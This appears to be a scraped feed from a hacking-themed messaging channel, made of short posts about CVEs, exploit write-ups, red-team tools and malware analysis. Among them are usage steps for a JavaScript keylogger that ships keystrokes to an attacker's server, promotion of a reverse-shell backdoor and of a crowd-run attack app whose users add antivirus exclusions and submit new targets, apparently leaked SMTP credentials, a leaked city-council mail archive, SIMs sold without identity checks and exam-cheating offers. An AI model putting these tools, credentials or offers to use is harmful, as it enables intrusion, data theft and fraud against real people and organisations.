🟥10k🔠 non stop Post uploading soon this Last month Happy💻 cyber security intelligent 💻
2022-12-19 17:37:56
2022-12-19 17:37:55
2022-12-19 17:37:54
2022-12-19 17:32:03
Wi-Fi SurveyorVisualize Wi-Fi signal strength over a geographic area.
2022-12-19 17:20:19
#Threat_ResearchEntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)]->
2022-12-19 16:35:24
|Exploit Notes|📑Exploit Notes github repoSticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTF.💾File Upload Attack💾Java Pentesting💾RE with Rizin💾Android Pentesting💾Pug Pentesting💾PE Analysis💾RE💾IMINT and GEOINT💾32-bit ARM Assembly💾OSINT💾x86 Assembly💾Malware Analysis💾BOF Attack
2022-12-19 16:35:03
🔥🔥🔥MeshyJSON: A TP-Link tdpServer JSON Stack OverflowThis blog post describes a vulnerability found and exploited in November 2022 by NCC Group. The target was the TP-Link AX1800 WiFi 6 Router (Archer AX21). It was running hardware version 3.6 and firmware version 1.1.1 (Archer AX21(US)_V3.6_1.1.1 Build 20220603). The vulnerability was patched on 2nd of December 2022 with firmware version 1.1.3 (Archer AX21(US)_V3.6_1.1.3 Build 20221125).
2022-12-19 16:34:34
|Offensive Security Cheatsheet|Document used to centralize many informations about cybersecurity techniques and payloads.💾OSINT💾Web Pentest💾Network💾Shells methods💾Windows Systems💾Linux Systems💾Other Systems💾Passcracking Hash & Files💾Phishing, RedTeam and SE💾Wireless💾Cryptography💾Pwn💾Defensive, Monitoring, CTI...💾External Resources
2022-12-19 16:33:24
🔥Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.
2022-12-19 16:06:54
​BlueTeam.LabThis project contains a set of Terraform and Ansible scripts to create an orchestrated BlueTeam Lab. The goal of this project is to provide the red and blue teams with the ability to deploy an ad-hoc detection lab to test various attacks and forensic artifacts on the latest Windows environment and then to get a 'SOC-like' view into generated data. #techniques #cybersecurity #infosec
2022-12-19 14:12:22
2022-12-19 10:18:19
Application Security Engineer, БанкЗП: 130-200 тыс.руб. netЛокация: Москва, КраснодарФормат работы: удаленно/офисЧем предстоит заниматься:- Внедрение, настройка и поддержка WAF, реагирование на атаки;- Проведение анализа безопасности разрабатываемого программного обеспечения и его архитектуры, выявление уязвимостей;- Формирование требований безопасности в проектной деятельности Банка;- Осуществление контроля устранение обнаруженных уязвимостей.Мы ожидаем от кандидата: - Опыт настройки и внедрения систем класса web application firewall (WAF); - Знание и понимание OWASP Top 10, применимых методологий, стандартов и практик в области безопасной разработки; - Понимание принципов работы современных веб-приложений (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, и др.); - Знание OS Linux на уровне администратора. - Понимание принципов защиты веб-приложений и умение исправлять найденные уязвимости на архитектурном уровне;Большим преимуществом будет: - Знание SQL, базовые навыки работы в различных СУБД; - Базовые навыки программирования на каком либо языке (python, php, go и т.п.).Контакт: @alya_988‌‌Translation: ru-enApplication Security Engineer, BankSalary: 130-200 thousand rubles. netLocation: Moscow, KrasnodarWork format: remotely/officeWhat is to be done:- Implementation, configuration and support of WAF, response to attacks;- Conducting a security analysis of the developed software and its architecture, identifying vulnerabilities;- Formation of security requirements in the Bank's project activities;- Monitoring the elimination of detected vulnerabilities.We expect from the candidate: - Experience in setting up and implementing web application firewall (WAF) class systems; - Knowledge and understanding of OWASP Top 10, applicable methodologies, standards and practices in the field of secure development; - Understanding the principles of modern web applications (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, etc.); - Knowledge of OS Linux at the administrator level. - Understanding the principles of protecting web applications and the ability to fix vulnerabilities found at the architectural level;The big advantage will be: - Knowledge of SQL, basic skills in various DBMS; - Basic programming skills in any language (python, php, go, etc.).Contact: @alya_988‌‌
2022-12-19 05:28:33
💥Ban-R•Features:~Reports Time Delay To Secure Your Acc~Temp Ban & Permanent Ban ~Fully Safe & Accessible~Works Without Proxies ~Anti Virtual Machine •Use 2013 Insta Accounts For Fast BanningDownload Link: Click Here 👈Password: #CyberRatsBanRBy Cyber_Rats ❤️
2022-12-19 03:09:18
#tools#Offensive_security1. Venom - library that meant to perform evasive communication using stolen browser socket Pingoor - Linux Backdoor based on ICMP protocol
2022-12-19 03:09:17
#Malware_analysis1. Munin - Online hash checker for Virustotal and other services Hunting for Attestation Signed Malware
2022-12-18 14:32:32
2022-12-18 13:39:14
🔥Venom is a C++ library that is meant to give an alternative way to communicate, instead of creating a socket that could be traced back to the process, it creates a new "hidden" (there is no window shown) detached edge process (edge was chosen because it is a browser that is installed on every Windows 10+ and won't raise suspicious) and stealing one of its sockets to perform the network operations.The benefit of creating a detached browser process is that there is no danger that it will be closed accidentally by the user and the sockets exist but not communicating with any site, therefore avoiding possible collisions.
2022-12-18 13:02:21
#tools#Offensive_security1. A simple ptrace-less shared library injector for x64 Linux EDRs Hooked APIs
2022-12-18 10:59:51
#exploit1. CVE-2022-41050:A vulnerability in the MS Windows' User-Mode Printer Drivers CVE-2022-46689:macOS Dirty Cow bug
2022-12-18 10:59:50
#Research"First, Do No Harm: Studying the manipulation of security headers in browser extensions", 2021.]-> Fast JavaScript parser:
2022-12-18 10:59:49
#Malware_analysis1. VidarStealer analysis Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC/Cobalt Strike
2022-12-18 09:26:11
Linux Hacking ToolsNessus– this tool can be used for Ubuntu hack, scan configuration settings, patches, and networks etc. it can be found at This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at above list is not exhaustive; it gives you an idea of the tools available for Ubuntu hacking and hacking Linux systems.
2022-12-18 03:01:24
💉linux_injector is a simple ptrace-less shared library injector for x64 Linux(Most Linuxes that use glibc should be supported).For control flow hijacking, this program needs a hijacking candidate. The code presented here uses malloc(), this can be changed by editing FUN_NAME and recompiling. Make sure the hooked function can run under 100ms, so that it won't be overwritten while it executes. This means calls like sleep or wait are bad candidates for the initial shellcode. The function in question also needs to be more than 0x50 long for the shellcode not to overwrite other functions.Usage:linux_injector <pid> <module>Where pid is target process id & module is a module to inject, will be dlopened in the remote process ⚠️The code expects that the target uses the same libc as available to us. If it does not, then the remote symbols won't be found. This could be fixed by reading the remote libraries and scanning for our symbols in them.
2022-12-18 03:01:23
💥MacDirtyCowDemo#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-17 16:29:16
New mini shell :)⚠️ Bypass All waf📌 Non Encoded :::)))
2022-12-17 15:45:08
⚠️Anyone who wants cyber security intelligent program hacking  related post can make me admin on their channel or group.  Post uploading will be done only in the channel group above 500 over subscribers. ⚠️ @hayper007 ⚠️
2022-12-17 13:18:13
2022-12-17 05:17:05
#Threat_Research1. Unusual Cache Poisoning between Akamai and S3 buckets HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
2022-12-17 05:17:04
#exploit1. CVE-2022-28672:Foxit PDF Reader - UaF RCE Exploit]-> CVE-2022-45451:Acronis Cyber Protect/Home Cyber Protect - Arbitrary File Read
2022-12-17 02:35:20
2022-12-17 02:27:11
🔥PingPlant is a Linux implant PoC that starts a custom listener for ICMP data, and parses the ethernet frame to check for a special payload.If this payload is found, it will then initiate a callback to a defined IP. Even though I have this connect back with a reverse shell, you could edit this to have it execute anything on the infected system when the special payload is received. Features:💾Runtime process renaming💾No listening ports💾Written in Go, so almost all AV's will never pick this up
2022-12-17 02:27:10
🔥Win32k User-Mode Printer Drivers StartDoc UAF(PoC included)A vulnerability(CVE-2022-41050) in the way BoundClipRGNToSurface merges surfaces allows attackers to trigger a UAF due to a function that frees the used data and then access it. If the memory where the freed memory is properly prepared, the attacker can control the crash and cause it to execute arbitrary code.
2022-12-17 02:27:09
🛡Akamai’s Perspective on December’s Patch Tuesday 2022In this report, we’ll assess how critical the vulnerabilities really are and how commonplace the affected applications and services are, and we’ll provide a realistic perspective on the bugs that were fixed.🛡December 2022 Patch Tuesday: 10 Critical CVEs, One Zero-Day, One Under Active Attack(crowdstrike)🛡Microsoft Patch Tuesday for December 2022 — Snort rules and prominent vulnerabilities(talos intelligence)🛡The December 2022 Security Update Review(ZDI)🛡Microsoft’s December 2022 Patch Tuesday Addresses 48 CVEs(tenable)🛡Microsoft Patch Tuesday, December 2022 Edition(KrebsonSecurity)🛡Patch Tuesday - December 2022(rapid7)
2022-12-16 15:05:00
2022-12-16 13:45:20
На Source Zero Con 2022 представили данный инструмент. Если кратко: кидаете скомпилированный бинарь, тулза из бинаря убирает известные IoC строки, подписывает сертом из другого бинаря, ну и помогает EDR обходить (за счёт увеличения размера файла) #pentest #bypass
2022-12-16 13:45:19
🔥String Obfuscation The Malware Way - blog postWhile this technique is not as secure as encryption, it can still be useful for malware authors who want to avoid detection by simple string analysis and other static analysis techniques. Not encrypting or encoding the strings will also help avoid entropy-based detections.💥MurkyStrings is a string obfuscator for .NET applications, built to evade static string analysis. It does not rely on encryption or encoding to evade entropy-based detections. Instead, it transforms strings into a murky mess by inserting special characters and random words. Removing them again on runtime.Usage:MurkyStrings.exe <file path> [--mode=<mode>]Available modes:💾replace[glyph] - Insert a variety of homoglyph characters that look identical to alphabetical characters💾replace[simple] - Insert random amounts of a special character in between all actual characters💾combine[glyph] - Combines remove and replace[glyph]💾combine[simple] - Combines remove and replace[simple]
2022-12-16 13:45:15
🔓Defeating Windows ASLR via low-entropy shared libraries in 2 hoursAs it was demonstrated in this article, ASLR implementation on Windows has important nuances and in some situation can introduce additional risk for an application, especially if the target is a 32-bit program or it is linked with a library which was compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. While the best solution would be to have per-execution randomization as it is done in Linux and modern MacOS, the good decision would be to move away from 32-bit to 64-bit applications and avoid linkage with shared libraries compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. This would help to significantly increase complexity of an attack.
2022-12-16 13:45:14
⌨️Javascript Keylogger can come handy in case you are able to access only DOM/JS of a website and want to get naughty.Usage:💾change url variable in keylogger.js to url address where keylogger.php is located💾load keylogger.js in the DOM of the attacked application💾put keylogger.php and data.txt to your server where you have data write access (don't forget to set pertinent file privileges).💥Profit! You're done, just let the victim come to attacked website with JS allowed in the browser and type something.
2022-12-16 13:45:12
🔥CVE-2021-43444 to 43449: Exploiting ONLYOFFICE Web Sockets for Unauthenticated RCE.
2022-12-16 13:45:11
🔥🔥🔥Foxit PDF Reader UAF RCE Exploit JIT Spraying(CVE-2022-28672) - blog post.This research shows that if Foxit Reader had been compiled with CFG support, the discovered bug would have been more difficult to exploit. However, the lack of CFG support allowed the attacker to use JIT spraying to bypass existing mitigations such as ASLR and DEP. This highlights the importance of using multiple layers of defense to protect against attacks.💥PoC Exploit📺Demo: Foxit PDF Reader RCE Demo - CVE-2022-28672
2022-12-16 11:19:40
2022-12-16 08:06:07
🌐 Cooprudea.comip, ip_long, user_login, user_id, stamp, activity, session_id, country, details, ac_bot, ac_status, ac_by_user email_to, subject, content, sender_name, sender_email, debug_mode, debugging_output, timestamp, status📣
2022-12-16 05:26:08
#Infographics#Offensive_securityDACLs (Active Directory Discretionary Access Control Lists) abuse
2022-12-16 05:26:07
#tools#Red_Team_Tactics1. Talon - password guessing tool that targets the Kerberos/LDAP services within the Windows AD environment Bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack Tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs
2022-12-16 05:26:06
#cryptographyComparison of Symmetric Encryption Methods
2022-12-16 05:26:05
#tools#Offensive_security1. udhcpc process crash on BusyBox 1.24.2 Signing-key abuse and update exploitation framework A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods
2022-12-16 05:26:04
#exploit1. CVE-2022-45771:Pwndoc LFI to RCE Discord Image Token Password Grabber Exploit
2022-12-16 05:25:13
#reversing#IoT_SecurityHow to Identify a Microcontroller Model Using Firmware Analysis
2022-12-15 16:06:51
🔥Windows Contacts(примеры использования Windows Contact API ) RCE vuln(CVE-2022-44666)⚠️Проблема(эта уязвимость покрывает не полностью проблему) не до конца исправлена, так что и подробности в виде рецензии от мелкомягких отложена на неопределенный срок!
2022-12-15 16:06:30
🔥You’ve Crossed the Line — Disturbing a Host’s RestAkamai Security Research dove deeply into MS-RPC research this past year. For a protocol that does so much, MS-RPC is largely under-researched, and it can have real-world effects. One of those effects is that vulnerabilities in an RPC interface become exposed. This is what we are focusing on in this blog post: vulnerabilities within the Local Session Manager (LSM) RPC interface. 🔥cve-2022-37973 PoC Exploit 🔥cve-2022-37998 PoC Exploit🧰RPC Toolkit(set of tools, articles, blog posts and links to help security researchers drive their RPC research)
2022-12-15 16:06:09
🔥Dragnmove is a post-exploitaition tool that infects files shared between users in order to move from one system to another. Dragnmove can detect actions like dropping a file into the browser window or attaching a file to an email client. After Dragnmove detects the action, it hooks CreateFile API calls to modify handles.
2022-12-15 15:02:52
2022-12-15 15:02:12
Free SMTP Anil$ Wisecow! Gsw28844$ Fatala1
2022-12-15 14:54:23
50 SMTP free Join VIP now $35 get smtp everyday. SMTP Stock 800+
2022-12-15 13:19:20
71 Python Projects with reference and source code.
2022-12-15 11:27:20
Hazir olun :)
2022-12-15 10:35:44
2022-12-15 03:19:46
Заканчиваем хит-парад маленьких городов Бурштынским городским советом. В архиве стандартно почта. Скоро будут базы. Честно‌‌Translation: ru-enWe finish the hit parade of small towns with the Burshtyn City Council. The archive is standard mail.Bases coming soon. Honestly‌‌
2022-12-15 02:23:58
Sim available without proof all sim reacharged 500/rs 1sim vodafone +91+ delivery charges600/rs 1sim jio +91+ delivery charges35sim Stock available 100% trusted escrow accepted@hayper007
2022-12-14 15:39:13
#Research"DISTDET: A Cost-Effective Distributed Cyber Threat Detection System", 2022.
2022-12-14 15:39:04
#tools#Offensive_security1. Nightly builds of common C# offensive tools Nemo - An offensive Remote Access Tool & Post-Exploitation Framework
2022-12-14 15:39:03
#Fuzzing1. Fuzzing ping(8)… and finding a 24 year old bug Finding JIT Optimizer Bugs using SMT Solvers and Fuzzing Fuzzing the Shield: CVE-2022-24548
2022-12-14 15:25:50
2022-12-14 15:01:23
2022-12-14 09:09:17
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2022-12-14 04:50:52
🇮🇷 Iranian rap about corrupt actors who are in the position of spiesBased on observations in Iran, there are actors who are willing to sell their homeland for money and spy for other countries.This issue has made the people of Iran very angry with some famous actors.It is expected that the Iranian government will take care of the request of its people and deal seriously with these spies.via "shabzadeh".#Celebrity_2zari #Green_card #Iranian_rap@YourJiniNews
2022-12-14 03:26:31
⚡️disBalancer App FAQWhat is happening⁉️We target Russian propaganda websites and sources that contribute to the Russian invasion of Ukraine. We want to make all the murders and violence caused by Russian military forces STOP. Troops are washing their hands in blood, killing the Ukrainians, both children and civilians. PLEASE, SHARE THE LINK ON THE APP AND LET’S #stopPutin TOGETHER!THE MORE PEOPLE RUN THE APP, THE MORE EFFECTIVE ATTACKS ARE!How to use the app⚫️ Download the file via⚫️ Unzip it ⚫️ Open the disBalancer app and click RUN That's it! You're in the cyber army 💪🏼Update! ‼️We are upgrading server (more resources = more people involved), if you will receive 500 error message or heartbeat error - don't worry, your soft still attacking and working!Minimal system requirements1) To run the application you need to have a .Net runtime version 4.5.2+ (higher version as 4.8 also would fit) If you have problems with restart, the last package Microsoft Visual C++ 2015 2019 Redistributable (x64 x86) will solve it. it possible to use the App on Mac OS or Linux?Our application is currently launched for Windows. Apps for other OS are on the way and will be announced soon. You can install and run the app on Mac OS and Linux using Boot Camp, VMWare, or Parallels Fusion. Antivirus exclusionsTo avoid any runtime problems until the app will be signed: Add the application folder to your antivirus exclusions to avoid blocking task execution, as some antiviruses could detect it as a hacker tool. Adding an application to the firewall exception would be also a good idea. The app isn’t server-based, it’s a simple client, so you don’t need to be aware of the hacking of the exposed web interface and host. Can I use VPN?It’s not required to use VPN to run the app but you can use it to provide your data encryption. VPN services are recommended:https://hackenvpn.comhttps:// to do if the error occurs?Be sure you have installed all required software described in minimal system requirements. In case of any issues with the application, please write #Error in the chat and attach the information.log file. It’s a file located near Disbalancer.exe. How do we know what targets we have? We don’t disclose targets until downtime. Targets that are currently under attack are hidden due to security purposes. After a website is in downtime, we send an inactive link to the disBalancer chat. Can I see the code?Unfortunately, we haven't done that yet due to the beta testing period. There are some things that we can't publish at all as well. For instance, hidden attack mechanics and algorithms, transfer batching, and time synchronization that make it possible to function normally. Can I share websites to make them unusable?Sure! Just send a link to it on our Telegram chat and add the hashtag #NewTarget.disBalancer UKRAINE 🇺🇦Since this chat was created for an English-speaking audience, we ask all Ukrainians to go to this chat for comfortable communication for everyone.Instruction in Ukrainian:
2022-12-13 14:52:51
2022-12-13 03:12:41
#Infographics#Infosec_StandardsTypes of VPN]-> RFC4026: "Provider Provisioned VPN Terminology", 2018.
2022-12-13 03:12:38
#reversing#ResearchBlackHat Europe 2022:"Exploring a New Class of Kernel Exploit Primitive".
2022-12-13 03:12:37
#exploit1. CVE-2022-45025:Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom) Exploring Chrome’s CVE-2020-6418 CVE-2022-39066:SQL Injection Vulnerability in ZTE MF286R
2022-12-13 03:12:36
#exploit1. ThinkPHP latest RCE reproduction and analysis Folina, Shadow Credentials, and WSUS exploitation CVE-2022-1361:Improper Neutralization of Special Elements Used In a SQL Command: New Technique Discovered To Bypass WAF Of Several Vendors
2022-12-13 03:12:35
#Offensive_security1. A collection of various and sundry code snippets that leverage .NET dynamic tradecraft Payload generator to exfiltrate user cookies through the PHP info page bypassing the HttpOnly flag during XSS exploitation From SQL Injection to RCE on Intel DCM (CVE-2022-21225)
2022-12-13 03:12:34
#compilersCodon - high-performance, zero-overhead, extensible Python compiler using LLVM
2022-12-13 03:12:33
#Red_Team_Tactics1. StealthHook - A method for hooking a function without modifying memory protection Frida script to bypass common methods of sslpining Android pipe_buffer arbitrary read write
2022-12-13 03:12:32
#exploit1. Exploiting CVE-2022-42703 - Bringing back the stack attack CVE-2022-36537:ZK Framework - Exposure of Sensitive Information to an Unauthorized Actor
2022-12-12 14:41:29
2022-12-12 13:06:08
Fuzzing ping(8)…and finding a 24 year old bug December 11, 2022 at 09:57AM by Gallusvia reddit
2022-12-06 03:04:38
#hardening"Hardening with Scapolite: a DevOps-based Approach for Improved Authoring and Testing of Security-Configuration Guides in Large Scale Organizations", 2022.
2022-12-06 03:04:37
#Tech_book"Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence", 2022.
2022-12-06 03:04:36
#reversing"Exploiting Branch Target Injection", 2021.
2022-12-06 03:04:18
#Malware_analysisAnti-Reversing Techniques Part 1: 2:
2022-12-06 03:04:17
#Tech_book"Black Hat Python: Python Programming for Hackers and Pentesters, 2nd Edition", 2021.]-> Python 3 Source Code:
2022-12-06 03:04:16
#Threat_Research#Blue_Team_Techniques1. Threatest - CLI and Go framework for end-to-end testing threat detection rules Detect Tactics, Techniques & Combat Threats
2022-12-06 03:04:15
#Malware_analysis1. ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware Blowing Cobalt Strike Out of the Water With Memory Analysis
2022-12-05 20:33:20
#Research"HearMeOut: Detecting Voice Phishing Activities in Android", 2022.]-> Voice phishing behavior detection system in AOSP:
2022-12-05 20:32:11
2022-12-05 09:22:56
2022-12-05 08:26:31
Titan: A generic user defined reflective DLL for Cobalt Strike simple PoC to invoke an encrypted shellcode by using an hidden call is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques small wiper malware programmed in c# new target domains using Content Security Policy is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team collect assets and automatically perform SQL injection detection (plug-in automatic Bypass), XSS detection, RCE detection, and sensitive information detection Extract the login log on the domain controller or remotely, and quickly obtain the IP address corresponding to the domain user a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis! is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing
2022-12-05 08:25:45
Shennina Automating Host Exploitation with AI A care package of useful bofs for red team engagments is a forked and enhanced version of TinyCheck. SpyGuard's main objective is to detect signs of compromise by monitoring network flows transmitted by a device
2022-12-03 17:06:53
​⚜ List of Websites Giving free RDP/VPS ⚜🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀
2022-12-03 13:13:17
2FA Bypass by @hackerscrolls
2022-12-02 21:53:44
2022-12-02 21:53:43
2022-12-01 18:59:00
#Research"Backporting Security Patches of Web Applications: A Prototype Design and Implementation on Injection Vulnerability Patches", 2022.
2022-12-01 18:58:57
#Fuzzing"SnapFuzz: An Efficient Fuzzing Framework for Network Applications", 2022.]->
2022-12-01 18:58:56
#Malware_analysis1. New details on commercial spyware vendor Variston HiveV5 file decryptor PoC
2022-12-01 18:56:41
#Cloud_SecurityA Detailed Talk about K8S Cluster Security from the Perspective of AttackersPart 1: 2:
2022-12-01 18:56:40
#Blue_Team_TechniquesGet-InjectedThreadEx - Detecting Thread Creation Trampolines]-> PowerShell detection script:
2022-12-01 18:56:39
#reversingGuide to Reversing and Exploiting iOS binariesPart 3 - Heap Overflows on iOS ARM64: Spraying, UAF]-> Part 1, 2:
2022-12-01 18:56:38
#tools#OSINTCVE and PoC SearchBot v.0.3.5:- search and monitoring of new CVE;- search and monitoring of PoCs.
2022-12-01 18:56:37
#tools#Sec_code_reviewHeap_detective - detect heap memory pitfalls in C++/C
2022-12-01 18:56:35
#DFIREmotet Strikes Again - LNK File Leads to Domain Wide Ransomware
2022-12-01 13:16:15
Bypassing Web Application Firewalls December 01, 2022 at 04:51PM by ma-nivia reddit
2022-12-01 07:23:46
Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntu December 01, 2022 at 07:23AM by Gallusvia reddit
2022-12-01 01:59:31
Exploiting an N-day vBulletin PHP Object Injection Vulnerability #APTIran
2022-11-30 15:36:19
📕A Journey To Pwn And Own The Sonos One Speaker
2022-11-30 15:35:37
💥USA's Military Empire: A Visual Database Военные базы США распластались во многих частях Земли и это ни для кого не секрет, визуальная БД поможет понять визуально масштабы вмешательства вездесущей "Американской мечты" дерьмократии.#наЗлобуДня
2022-11-30 15:35:21
🔥Home Grown Red Team: Lateral Movement With Havoc C2 And Microsoft EDRLateral movement is extremely important for any red team engagement. Getting your initial shell is great, but if you can’t move off the box you could be dead in the water.
2022-11-30 09:09:04
Hive Ransomware v5-5.2 file decryption tool
2022-11-30 07:33:47
SGX.Fail - Overview of SGX Attacks November 30, 2022 at 07:59AM by Gallusvia reddit
2022-11-30 06:29:29
☃️Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet☃️➡️ Wireless Testing➡️ Networking➡️ Mobile App Testing much more...#oscp #bugbounty #activedirectory #redteaming #infosec #hacking #cybersecurity
2022-11-30 01:57:03
Xiongmai IoT Exploitation November 30, 2022 at 01:50AM by chicksdigthelongrunvia reddit
2022-11-29 17:03:04
Are you looking for OSINT books? In the overview below you will find various books about Open Source Intelligence (OSINT), Social Media Intelligence (SOCMINT), Privacy, Hacking, Red Teaming, Blue Teaming, Brand Protection, Automation and more! ▫️ security post uploader admin @hayper007
2022-11-29 15:20:57
​​BugBountyTips#BugBounty (Bypasses, Payloads, y más)
2022-11-29 12:00:18
​​otpOne Time Password utilities Go / GolangOne Time Passwords (OTPs) are an mechanism to improve security over passwords alone. When a Time-based OTP (TOTP) is stored on a user's phone, and combined with something the user knows (Password), you have an easy on-ramp to Multi-factor authentication without adding a dependency on a SMS provider. This Password and TOTP combination is used by many popular websites including Google, GitHub, Facebook, Salesforce and many others.The otp library enables you to easily add TOTPs to your own application, increasing your user's security against mass-password breaches and malware.
2022-11-29 12:00:17
#mobile #dfir
2022-11-29 04:03:56 leak leak igsample #hacker_bano_chutiya_nhe 👻👻
2022-11-28 17:37:00
2022-11-28 16:03:23
2022-11-28 13:41:43
🔥Mind the Gap The week before FirstCon22, Maddie gave an internal preview of her talk("0-day In-the-Wild Exploitation in 2022…so far"). Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).⚠️The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
2022-11-28 13:39:38
#Research"Investigating co-occurrences of MITRE ATT\&CK Techniques", 2022.
2022-11-28 13:39:37
#Infosec_StandardsNIST SP 800-215: "Guide to a Secure Enterprise Network Landscape", August 5, 2022.
2022-11-28 13:39:34
#DFIR#Blue_Team_TechniquesLinux Forensics
2022-11-28 13:39:33
#IoT_Security1. Vulnerabilities in BMC Firmware Affect OT/IoT Device Security IoT Security Administrator’s Guide
2022-11-28 13:39:32
#Cloud_SecurityA Azure Exploitation Toolkit for Red Team & Pentesters
2022-11-28 13:39:31
#tools#Offensive_security1. A terminal-based editor for PowerShell Cobalt Strike Community Kit - central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
2022-11-28 11:38:23
Containers: Rootful, Rootless, Privileged and Super Privileged.
2022-11-27 14:19:28
📌Manual SQL Injection Cheatsheet#bugbounty #infosec
2022-11-27 12:53:32
2022-11-27 12:02:06
💥NETGEAR R7800 AFPD PreAuth + PoC exploitA heap-buffer overflow in afpdʼs dsi_writeinit is leveraged to overwrite the proto_close function pointer in the DSI struct, and execute arbitrary code on the NETGEAR R7800 Smart Router, in the default configuration, on the LAN side, pre-auth.
2022-11-27 12:01:55
🔥Vulnerabilities in BMC Firmware Affect OT/IoT Device Security(part1)By abusing these vulnerabilities, an unauthenticated attacker may achieve RCE with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement.
2022-11-27 12:01:40
💥Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor NoticeNighthawk is a mature and advanced commercial C2 framework for lawful red team operations that is specifically built for detection evasion, and it does this well. While Proofpoint researchers are not aware of adoption of Nighthawk in the wild by attributed threat actors, it would be incorrect and dangerous to assume that this tool will never be appropriated by threat actors with a variety of intexfnts and purposes.🔥🔥🔥PoC of the removed registered LdrDllNotification for your enjoyment. 🔥🔥🔥PoC for utilizing RtlQueueWorkItem to load libraries
2022-11-26 17:01:32
2022-11-26 14:13:51
#Research"Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks", 2022.]->
2022-11-26 14:13:50
#Red_Team_Tactics1. Header spoofing via a hidden parameter in Facebook Batch GraphQL APIs UAC Bypass On Windows Defender For Endpoint With HighBorn
2022-11-26 14:13:49
#Research"SARA: Secure Android Remote Authorization", 2022.]-> Repo: